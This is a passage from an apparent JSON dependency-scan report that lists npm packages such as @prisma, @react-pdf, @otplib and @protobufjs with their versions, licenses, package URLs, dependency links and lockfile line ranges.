"pkg:npm/%40next/swc-linux-arm64-gnu@14.2.3", "UID": "35f5ba8ee5d81bef" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1611, "EndLine": 1626 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-linux-arm64-musl@14.2.3", "Name": "@next/swc-linux-arm64-musl", "Identifier": { "PURL": "pkg:npm/%40next/swc-linux-arm64-musl@14.2.3", "UID": "6c255e66f42eaeac" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1627, "EndLine": 1642 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-linux-x64-gnu@14.2.3", "Name": "@next/swc-linux-x64-gnu", "Identifier": { "PURL": "pkg:npm/%40next/swc-linux-x64-gnu@14.2.3", "UID": "803644e854a1f62" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1643, "EndLine": 1658 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-linux-x64-musl@14.2.3", "Name": "@next/swc-linux-x64-musl", "Identifier": { "PURL": "pkg:npm/%40next/swc-linux-x64-musl@14.2.3", "UID": "2c1a5cf01d5007db" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1659, "EndLine": 1674 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-win32-arm64-msvc@14.2.3", "Name": "@next/swc-win32-arm64-msvc", "Identifier": { "PURL": "pkg:npm/%40next/swc-win32-arm64-msvc@14.2.3", "UID": "d34908e1e777e08b" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1675, "EndLine": 1690 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-win32-ia32-msvc@14.2.3", "Name": "@next/swc-win32-ia32-msvc", "Identifier": { "PURL": "pkg:npm/%40next/swc-win32-ia32-msvc@14.2.3", "UID": "a3e5ff8ac435e64e" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1691, "EndLine": 1706 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-win32-x64-msvc@14.2.3", "Name": "@next/swc-win32-x64-msvc", "Identifier": { "PURL": "pkg:npm/%40next/swc-win32-x64-msvc@14.2.3", "UID": "dc497037375f62db" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1707, "EndLine": 1722 } ], "AnalyzedBy": "npm" }, { "ID": "@noble/ciphers@1.3.0", "Name": "@noble/ciphers", "Identifier": { "PURL": "pkg:npm/%40noble/ciphers@1.3.0", "UID": "fd19337833641d82" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1723, "EndLine": 1734 } ], "AnalyzedBy": "npm" }, { "ID": "@noble/hashes@1.8.0", "Name": "@noble/hashes", "Identifier": { "PURL": "pkg:npm/%40noble/hashes@1.8.0", "UID": "4d82546712633fbd" }, "Version": "1.8.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1735, "EndLine": 1746 } ], "AnalyzedBy": "npm" }, { "ID": "@nodable/entities@2.1.0", "Name": "@nodable/entities", "Identifier": { "PURL": "pkg:npm/%40nodable/entities@2.1.0", "UID": "ed0bac1f7e7af25f" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1747, "EndLine": 1759 } ], "AnalyzedBy": "npm" }, { "ID": "@nodelib/fs.scandir@2.1.5", "Name": "@nodelib/fs.scandir", "Identifier": { "PURL": "pkg:npm/%40nodelib/fs.scandir@2.1.5", "UID": "24c8e559f75b9ff1" }, "Version": "2.1.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@nodelib/fs.stat@2.0.5", "run-parallel@1.2.0" ], "Locations": [ { "StartLine": 1760, "EndLine": 1772 } ], "AnalyzedBy": "npm" }, { "ID": "@nodelib/fs.stat@2.0.5", "Name": "@nodelib/fs.stat", "Identifier": { "PURL": "pkg:npm/%40nodelib/fs.stat@2.0.5", "UID": "695e27b7bd8bc4a3" }, "Version": "2.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1773, "EndLine": 1781 } ], "AnalyzedBy": "npm" }, { "ID": "@nodelib/fs.walk@1.2.8", "Name": "@nodelib/fs.walk", "Identifier": { "PURL": "pkg:npm/%40nodelib/fs.walk@1.2.8", "UID": "d1cf951d273e7f57" }, "Version": "1.2.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@nodelib/fs.scandir@2.1.5", "fastq@1.20.1" ], "Locations": [ { "StartLine": 1782, "EndLine": 1794 } ], "AnalyzedBy": "npm" }, { "ID": "@one-ini/wasm@0.1.1", "Name": "@one-ini/wasm", "Identifier": { "PURL": "pkg:npm/%40one-ini/wasm@0.1.1", "UID": "d7afb4b95f9871be" }, "Version": "0.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1795, "EndLine": 1800 } ], "AnalyzedBy": "npm" }, { "ID": "@opentelemetry/api@1.9.1", "Name": "@opentelemetry/api", "Identifier": { "PURL": "pkg:npm/%40opentelemetry/api@1.9.1", "UID": "3d1d469bf1c89f7" }, "Version": "1.9.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1801, "EndLine": 1810 } ], "AnalyzedBy": "npm" }, { "ID": "@otplib/core@12.0.1", "Name": "@otplib/core", "Identifier": { "PURL": "pkg:npm/%40otplib/core@12.0.1", "UID": "8c7433bcb064243" }, "Version": "12.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1811, "EndLine": 1816 } ], "AnalyzedBy": "npm" }, { "ID": "@otplib/plugin-crypto@12.0.1", "Name": "@otplib/plugin-crypto", "Identifier": { "PURL": "pkg:npm/%40otplib/plugin-crypto@12.0.1", "UID": "8c029d598e4d20b0" }, "Version": "12.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@otplib/core@12.0.1" ], "Locations": [ { "StartLine": 1817, "EndLine": 1826 } ], "AnalyzedBy": "npm" }, { "ID": "@otplib/plugin-thirty-two@12.0.1", "Name": "@otplib/plugin-thirty-two", "Identifier": { "PURL": "pkg:npm/%40otplib/plugin-thirty-two@12.0.1", "UID": "43721dbe2c863f60" }, "Version": "12.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@otplib/core@12.0.1", "thirty-two@1.0.2" ], "Locations": [ { "StartLine": 1827, "EndLine": 1837 } ], "AnalyzedBy": "npm" }, { "ID": "@otplib/preset-default@12.0.1", "Name": "@otplib/preset-default", "Identifier": { "PURL": "pkg:npm/%40otplib/preset-default@12.0.1", "UID": "f5a349ea11a9d189" }, "Version": "12.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@otplib/core@12.0.1", "@otplib/plugin-crypto@12.0.1", "@otplib/plugin-thirty-two@12.0.1" ], "Locations": [ { "StartLine": 1838, "EndLine": 1849 } ], "AnalyzedBy": "npm" }, { "ID": "@otplib/preset-v11@12.0.1", "Name": "@otplib/preset-v11", "Identifier": { "PURL": "pkg:npm/%40otplib/preset-v11@12.0.1", "UID": "66521fbaa0b6efe4" }, "Version": "12.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@otplib/core@12.0.1", "@otplib/plugin-crypto@12.0.1", "@otplib/plugin-thirty-two@12.0.1" ], "Locations": [ { "StartLine": 1850, "EndLine": 1860 } ], "AnalyzedBy": "npm" }, { "ID": "@pkgjs/parseargs@0.11.0", "Name": "@pkgjs/parseargs", "Identifier": { "PURL": "pkg:npm/%40pkgjs/parseargs@0.11.0", "UID": "7b745dbb6211cbf3" }, "Version": "0.11.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1871, "EndLine": 1880 } ], "AnalyzedBy": "npm" }, { "ID": "@prisma/client@5.22.0", "Name": "@prisma/client", "Identifier": { "PURL": "pkg:npm/%40prisma/client@5.22.0", "UID": "e2463266a9694e63" }, "Version": "5.22.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "prisma@5.22.0" ], "Locations": [ { "StartLine": 1881, "EndLine": 1898 } ], "AnalyzedBy": "npm" }, { "ID": "@prisma/debug@5.22.0", "Name": "@prisma/debug", "Identifier": { "PURL": "pkg:npm/%40prisma/debug@5.22.0", "UID": "86236e2543f93da" }, "Version": "5.22.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1899, "EndLine": 1905 } ], "AnalyzedBy": "npm" }, { "ID": "@prisma/engines@5.22.0", "Name": "@prisma/engines", "Identifier": { "PURL": "pkg:npm/%40prisma/engines@5.22.0", "UID": "325c20920a2c3688" }, "Version": "5.22.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@prisma/debug@5.22.0", "@prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "@prisma/fetch-engine@5.22.0", "@prisma/get-platform@5.22.0" ], "Locations": [ { "StartLine": 1906, "EndLine": 1919 } ], "AnalyzedBy": "npm" }, { "ID": "@prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "Name": "@prisma/engines-version", "Identifier": { "PURL": "pkg:npm/%40prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "UID": "c0d189c3fa35f3ae" }, "Version": "5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1920, "EndLine": 1926 } ], "AnalyzedBy": "npm" }, { "ID": "@prisma/fetch-engine@5.22.0", "Name": "@prisma/fetch-engine", "Identifier": { "PURL": "pkg:npm/%40prisma/fetch-engine@5.22.0", "UID": "39dcf7ec6736f759" }, "Version": "5.22.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@prisma/debug@5.22.0", "@prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "@prisma/get-platform@5.22.0" ], "Locations": [ { "StartLine": 1927, "EndLine": 1938 } ], "AnalyzedBy": "npm" }, { "ID": "@prisma/get-platform@5.22.0", "Name": "@prisma/get-platform", "Identifier": { "PURL": "pkg:npm/%40prisma/get-platform@5.22.0", "UID": "ac1badc0a3432a3c" }, "Version": "5.22.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@prisma/debug@5.22.0" ], "Locations": [ { "StartLine": 1939, "EndLine": 1948 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/aspromise@1.1.2", "Name": "@protobufjs/aspromise", "Identifier": { "PURL": "pkg:npm/%40protobufjs/aspromise@1.1.2", "UID": "cc0028b452205e63" }, "Version": "1.1.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1949, "EndLine": 1955 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/base64@1.1.2", "Name": "@protobufjs/base64", "Identifier": { "PURL": "pkg:npm/%40protobufjs/base64@1.1.2", "UID": "8b19ed0ce9f8f0c" }, "Version": "1.1.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1956, "EndLine": 1962 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/codegen@2.0.5", "Name": "@protobufjs/codegen", "Identifier": { "PURL": "pkg:npm/%40protobufjs/codegen@2.0.5", "UID": "66b6686c958a4e22" }, "Version": "2.0.5", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1963, "EndLine": 1969 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/eventemitter@1.1.0", "Name": "@protobufjs/eventemitter", "Identifier": { "PURL": "pkg:npm/%40protobufjs/eventemitter@1.1.0", "UID": "d69e455b94b976c6" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1970, "EndLine": 1976 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/fetch@1.1.0", "Name": "@protobufjs/fetch", "Identifier": { "PURL": "pkg:npm/%40protobufjs/fetch@1.1.0", "UID": "fca39b412276b6e8" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@protobufjs/aspromise@1.1.2", "@protobufjs/inquire@1.1.1" ], "Locations": [ { "StartLine": 1977, "EndLine": 1987 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/float@1.0.2", "Name": "@protobufjs/float", "Identifier": { "PURL": "pkg:npm/%40protobufjs/float@1.0.2", "UID": "30a8b5dd4e76a00e" }, "Version": "1.0.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1988, "EndLine": 1994 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/inquire@1.1.1", "Name": "@protobufjs/inquire", "Identifier": { "PURL": "pkg:npm/%40protobufjs/inquire@1.1.1", "UID": "d6749b8f84a66418" }, "Version": "1.1.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1995, "EndLine": 2001 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/path@1.1.2", "Name": "@protobufjs/path", "Identifier": { "PURL": "pkg:npm/%40protobufjs/path@1.1.2", "UID": "ccf386043e695f89" }, "Version": "1.1.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2002, "EndLine": 2008 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/pool@1.1.0", "Name": "@protobufjs/pool", "Identifier": { "PURL": "pkg:npm/%40protobufjs/pool@1.1.0", "UID": "bac25c6f940c763a" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2009, "EndLine": 2015 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/utf8@1.1.1", "Name": "@protobufjs/utf8", "Identifier": { "PURL": "pkg:npm/%40protobufjs/utf8@1.1.1", "UID": "7532ec91d4dcb3" }, "Version": "1.1.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2016, "EndLine": 2022 } ], "AnalyzedBy": "npm" }, { "ID": "@react-email/render@0.0.16", "Name": "@react-email/render", "Identifier": { "PURL": "pkg:npm/%40react-email/render@0.0.16", "UID": "afd54c61cb746a4e" }, "Version": "0.0.16", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "html-to-text@9.0.5", "js-beautify@1.15.4", "react-dom@18.3.1", "react-promise-suspense@0.3.4", "react@18.3.1" ], "Locations": [ { "StartLine": 2023, "EndLine": 2040 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/fns@2.2.1", "Name": "@react-pdf/fns", "Identifier": { "PURL": "pkg:npm/%40react-pdf/fns@2.2.1", "UID": "5c198d4528406f92" }, "Version": "2.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2" ], "Locations": [ { "StartLine": 2041, "EndLine": 2049 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/fns@3.1.3", "Name": "@react-pdf/fns", "Identifier": { "PURL": "pkg:npm/%40react-pdf/fns@3.1.3", "UID": "6ad3c91d416d181" }, "Version": "3.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2205, "EndLine": 2210 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/font@2.5.2", "Name": "@react-pdf/font", "Identifier": { "PURL": "pkg:npm/%40react-pdf/font@2.5.2", "UID": "462afc411a2ebe78" }, "Version": "2.5.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/types@2.11.1", "cross-fetch@3.2.0", "fontkit@2.0.4", "is-url@1.2.4" ], "Locations": [ { "StartLine": 2050, "EndLine": 2062 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/font@4.0.8", "Name": "@react-pdf/font", "Identifier": { "PURL": "pkg:npm/%40react-pdf/font@4.0.8", "UID": "de5a92dbb166dd1a" }, "Version": "4.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-pdf/pdfkit@5.1.1", "@react-pdf/types@2.11.1", "fontkit@2.0.4", "is-url@1.2.4" ], "Locations": [ { "StartLine": 2211, "EndLine": 2222 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/image@2.3.6", "Name": "@react-pdf/image", "Identifier": { "PURL": "pkg:npm/%40react-pdf/image@2.3.6", "UID": "f6d603a2e91f0051" }, "Version": "2.3.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/png-js@2.3.1", "cross-fetch@3.2.0", "jay-peg@1.1.1" ], "Locations": [ { "StartLine": 2063, "EndLine": 2074 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/layout@3.13.0", "Name": "@react-pdf/layout", "Identifier": { "PURL": "pkg:npm/%40react-pdf/layout@3.13.0", "UID": "501872a8793ee920" }, "Version": "3.13.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/fns@2.2.1", "@react-pdf/image@2.3.6", "@react-pdf/pdfkit@3.2.0", "@react-pdf/primitives@3.1.1", "@react-pdf/stylesheet@4.3.0", "@react-pdf/textkit@4.4.1", "@react-pdf/types@2.11.1", "cross-fetch@3.2.0", "emoji-regex@10.6.0", "queue@6.0.2", "yoga-layout@2.0.1" ], "Locations": [ { "StartLine": 2075, "EndLine": 2094 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/pdfkit@3.2.0", "Name": "@react-pdf/pdfkit", "Identifier": { "PURL": "pkg:npm/%40react-pdf/pdfkit@3.2.0", "UID": "452f732c452f9297" }, "Version": "3.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/png-js@2.3.1", "browserify-zlib@0.2.0", "crypto-js@4.2.0", "fontkit@2.0.4", "jay-peg@1.1.1", "vite-compatible-readable-stream@3.6.1" ], "Locations": [ { "StartLine": 2095, "EndLine": 2109 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/pdfkit@5.1.1", "Name": "@react-pdf/pdfkit", "Identifier": { "PURL": "pkg:npm/%40react-pdf/pdfkit@5.1.1", "UID": "b6af1eae66473d4a" }, "Version": "5.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@noble/ciphers@1.3.0", "@noble/hashes@1.8.0", "browserify-zlib@0.2.0", "fontkit@2.0.4", "jay-peg@1.1.1", "js-md5@0.8.3", "linebreak@1.1.0", "png-js@2.0.0", "vite-compatible-readable-stream@3.6.1" ], "Locations": [ { "StartLine": 2223, "EndLine": 2240 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/png-js@2.3.1", "Name": "@react-pdf/png-js", "Identifier": { "PURL": "pkg:npm/%40react-pdf/png-js@2.3.1", "UID": "9be4c6b4b0c6f0d6" }, "Version": "2.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "browserify-zlib@0.2.0" ], "Locations": [ { "StartLine": 2110, "EndLine": 2118 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/primitives@3.1.1", "Name": "@react-pdf/primitives", "Identifier": { "PURL": "pkg:npm/%40react-pdf/primitives@3.1.1", "UID": "aa34a561d882ad4c" }, "Version": "3.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2119, "EndLine": 2124 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/primitives@4.3.0", "Name": "@react-pdf/primitives", "Identifier": { "PURL": "pkg:npm/%40react-pdf/primitives@4.3.0", "UID": "bd2306e2fdc6cc5a" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2241, "EndLine": 2246 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/render@3.5.0", "Name": "@react-pdf/render", "Identifier": { "PURL": "pkg:npm/%40react-pdf/render@3.5.0", "UID": "ee9d487433844bfd" }, "Version": "3.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/fns@2.2.1", "@react-pdf/primitives@3.1.1", "@react-pdf/textkit@4.4.1", "@react-pdf/types@2.11.1", "abs-svg-path@0.1.1", "color-string@1.9.1", "normalize-svg-path@1.1.0", "parse-svg-path@0.1.2", "svg-arc-to-cubic-bezier@3.2.0" ], "Locations": [ { "StartLine": 2125, "EndLine": 2142 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/renderer@3.4.5", "Name": "@react-pdf/renderer", "Identifier": { "PURL": "pkg:npm/%40react-pdf/renderer@3.4.5", "UID": "30f7b15569b18830" }, "Version": "3.4.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/font@2.5.2", "@react-pdf/layout@3.13.0", "@react-pdf/pdfkit@3.2.0", "@react-pdf/primitives@3.1.1", "@react-pdf/render@3.5.0", "@react-pdf/types@2.11.1", "events@3.3.0", "object-assign@4.1.1", "prop-types@15.8.1", "queue@6.0.2", "react@18.3.1", "scheduler@0.17.0" ], "Locations": [ { "StartLine": 2143, "EndLine": 2165 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/stylesheet@4.3.0", "Name": "@react-pdf/stylesheet", "Identifier": { "PURL": "pkg:npm/%40react-pdf/stylesheet@4.3.0", "UID": "f6d4ed23b7d74197" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/fns@2.2.1", "@react-pdf/types@2.11.1", "color-string@1.9.1", "hsl-to-hex@1.0.0", "media-engine@1.0.3", "postcss-value-parser@4.2.0" ], "Locations": [ { "StartLine": 2166, "EndLine": 2180 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/stylesheet@6.2.1", "Name": "@react-pdf/stylesheet", "Identifier": { "PURL": "pkg:npm/%40react-pdf/stylesheet@6.2.1", "UID": "3047a0fd189f064f" }, "Version": "6.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-pdf/fns@3.1.3", "@react-pdf/types@2.11.1", "color-string@2.1.4", "hsl-to-hex@1.0.0", "media-engine@1.0.3", "postcss-value-parser@4.2.0" ], "Locations": [ { "StartLine": 2247, "EndLine": 2260 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/textkit@4.4.1", "Name": "@react-pdf/textkit", "Identifier": { "PURL": "pkg:npm/%40react-pdf/textkit@4.4.1", "UID": "21c4ad2126360102" }, "Version": "4.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/fns@2.2.1", "bidi-js@1.0.3", "hyphen@1.14.1", "unicode-properties@1.4.1" ], "Locations": [ { "StartLine": 2181, "EndLine": 2193 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/types@2.11.1", "Name": "@react-pdf/types", "Identifier": { "PURL": "pkg:npm/%40react-pdf/types@2.11.1", "UID": "35a04dce747be15f" }, "Version": "2.11.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-pdf/font@4.0.8", "@react-pdf/primitives@4.3.0", "@react-pdf/stylesheet@6.2.1" ], "Locations": [ { "StartLine": 2194, "EndLine": 2204 } ], "AnalyzedBy": "npm" }, { "ID": "@selderee/plugin-htmlparser2@0.11.0", "Name": "@selderee/plugin-htmlparser2", "Identifier": { "PURL": "pkg:npm/%40selderee/plugin-htmlparser2@0.11.0", "UID": "ac11306a3ee51a3" }, "Version": "0.11.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "domhandler@5.0.3", "selderee@0.11.0" ], "Locations": [ { "StartLine": 2695, "EndLine": 2707 } ], "AnalyzedBy": "npm" }, { "ID": "@socket.io/component-emitter@3.1.2", "Name": "@socket.io/component-emitter", "Identifier": { "PURL": "pkg:npm/%40socket.io/component-emitter@3.1.2", "UID": "97cdac300a40f2a7" }, "Version": "3.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2715, "EndLine": 2720 } ], "AnalyzedBy": "npm" }, { "ID": "@swc/counter@0.1.3", "Name": "@swc/counter", "Identifier": { "PURL": "pkg:npm/%40swc/counter@0.1.3", "UID": "f52c1ef5929e45d8" }, "Version": "0.1.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2721, "EndLine": 2726 } ], "AnalyzedBy": "npm" }, { "ID": "@swc/helpers@0.5.21", "Name": "@swc/helpers", "Identifier": { "PURL": "pkg:npm/%40swc/helpers@0.5.21", "UID": "5d92846d54fa2a4f" }, "Version": "0.5.21", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tslib@2.8.1" ], "Locations": [ { "StartLine": 2727, "EndLine": 2735 } ], "AnalyzedBy": "npm" }, { "ID": "@swc/helpers@0.5.5", "Name": "@swc/helpers", "Identifier": { "PURL": "pkg:npm/%40swc/helpers@0.5.5", "UID": "6ca366c10305d371" }, "Version": "0.5.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@swc/counter@0.1.3", "tslib@2.4.1" ], "Locations": [ { "StartLine": 7281, "EndLine": 7290 } ], "AnalyzedBy": "npm" }, { "ID": "@tootallnate/once@2.0.0", "Name": "@tootallnate/once", "Identifier": { "PURL": "pkg:npm/%40tootallnate/once@2.0.0", "UID": "22f57853d23edc3a" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2742, "EndLine": 2751 } ], "AnalyzedBy": "npm" }, { "ID": "@types/caseless@0.12.5", "Name": "@types/caseless", "Identifier": { "PURL": "pkg:npm/%40types/caseless@0.12.5", "UID": "3dd9740db251615" }, "Version": "0.12.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2798, "EndLine": 2804 } ], "AnalyzedBy": "npm" }, { "ID": "@types/cors@2.8.19", "Name": "@types/cors", "Identifier": { "PURL": "pkg:npm/%40types/cors@2.8.19", "UID": "2312b62bda407388" }, "Version": "2.8.19", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/node@20.19.39" ], "Locations": [ { "StartLine": 2822, "EndLine": 2830 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-array@3.2.2", "Name": "@types/d3-array", "Identifier": { "PURL": "pkg:npm/%40types/d3-array@3.2.2", "UID": "7958f5ac026eed8c" }, "Version": "3.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2831, "EndLine": 2836 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-color@3.1.3", "Name": "@types/d3-color", "Identifier": { "PURL": "pkg:npm/%40types/d3-color@3.1.3", "UID": "375186a8ff5dcb93" }, "Version": "3.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2837, "EndLine": 2842 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-ease@3.0.2", "Name": "@types/d3-ease", "Identifier": { "PURL": "pkg:npm/%40types/d3-ease@3.0.2", "UID": "67ff7b5bd571efaf" }, "Version": "3.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2843, "EndLine": 2848 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-interpolate@3.0.4", "Name": "@types/d3-interpolate", "Identifier": { "PURL": "pkg:npm/%40types/d3-interpolate@3.0.4", "UID": "3f910c0dfbc823e" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/d3-color@3.1.3" ], "Locations": [ { "StartLine": 2849, "EndLine": 2857 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-path@3.1.1", "Name": "@types/d3-path", "Identifier": { "PURL": "pkg:npm/%40types/d3-path@3.1.1", "UID": 